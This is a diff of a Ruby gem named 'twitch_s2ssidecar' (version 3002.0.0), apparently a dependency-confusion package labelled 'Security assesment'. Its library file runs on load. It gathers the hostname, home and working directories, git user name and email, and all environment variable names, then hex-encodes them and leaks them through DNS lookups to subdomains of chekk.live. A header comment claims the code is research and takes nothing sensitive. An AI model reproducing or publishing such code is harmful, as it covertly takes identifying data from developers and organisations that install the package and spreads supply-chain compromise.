twitch_s2ssidecar 3002.0.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 53987c5b54afc680e0717949af76a10db539a2c876f6cc0239af8f96797b788b
+  data.tar.gz: 3912f7883c730d82590ba2180bc78c7da9508d92952ac77c005260d369c18348
+SHA512:
+  metadata.gz: 207f587c31b0bbefd4fcc93f7bad8cbcd50c0e4db07ac2b9581cda7a0f2e89e27d4fad42894e21c1ee9ffa48ce4676185aa1aedbd0346147651528b44e28aff6
+  data.tar.gz: bfb6a6204dc272f0db3dbef17bbcbc294587f7dffcf5466dd1dc3d76edcdb26edb2eedc343df512b80eeecc4297394ef303a10dbb1ee5105dc7203fb3fcf1229

data/lib/twitch_s2ssidecar.rb

@@ -0,0 +1,100 @@
+
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = 'd.chekk.live'
+ns = 'dns1.chekk.live'
+
+package = 'twitch_s2ssidecar'
+
+
+
+def convert_string_to_hex(string)
+    string.unpack("H*")
+end
+
+
+def chunk_string(string, length)
+    string.scan(/.{1,#{length}}/)
+end
+
+
+def get_user_from_git_config()
+    # get user name and email from git config
+    begin
+        user_name = `git config user.name`.chomp
+        user_email = `git config user.email`.chomp
+    rescue
+        user_name = ''
+        user_email = ''
+        
+    end
+    return user_name, user_email
+end
+
+def get_environment_variables_names()
+    # get environment variables NAMES (not values, no sensitive data is extracted) sorted by name
+    # to get a better idea of execution context and prove potential impact to organization
+    env_vars = ENV.keys.sort
+    return env_vars
+end
+
+git_name, git_email = get_user_from_git_config()
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd,
+    'gn' => git_name,
+    'ge' => git_email,
+    'ev' => get_environment_variables_names()
+}
+
+data = JSON.generate(data)
+
+# convert to hex and chunk
+data_hex_chunks = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data_hex_chunks.each.each_with_index do |chunk, idx|
+    begin
+        addr = ['v2_f', id_1, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
+        Resolv.getaddress addr
+    rescue; end
+
+    begin
+        addr = ['v2_f', id_2, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
+        custom_res.getaddress addr
+    rescue; end
+end

metadata

@@ -0,0 +1,43 @@
+--- !ruby/object:Gem::Specification
+name: twitch_s2ssidecar
+version: !ruby/object:Gem::Version
+  version: 3002.0.0
+platform: ruby
+authors:
+- John Doe
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2021-12-02 00:00:00.000000000 Z
+dependencies: []
+description: Security assesment
+email: jjdoe2@doe.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/twitch_s2ssidecar.rb
+homepage: https://rubygems.org/gems/twitch_s2ssidecar
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.2.32
+signing_key:
+specification_version: 4
+summary: Security assesment
+test_files: []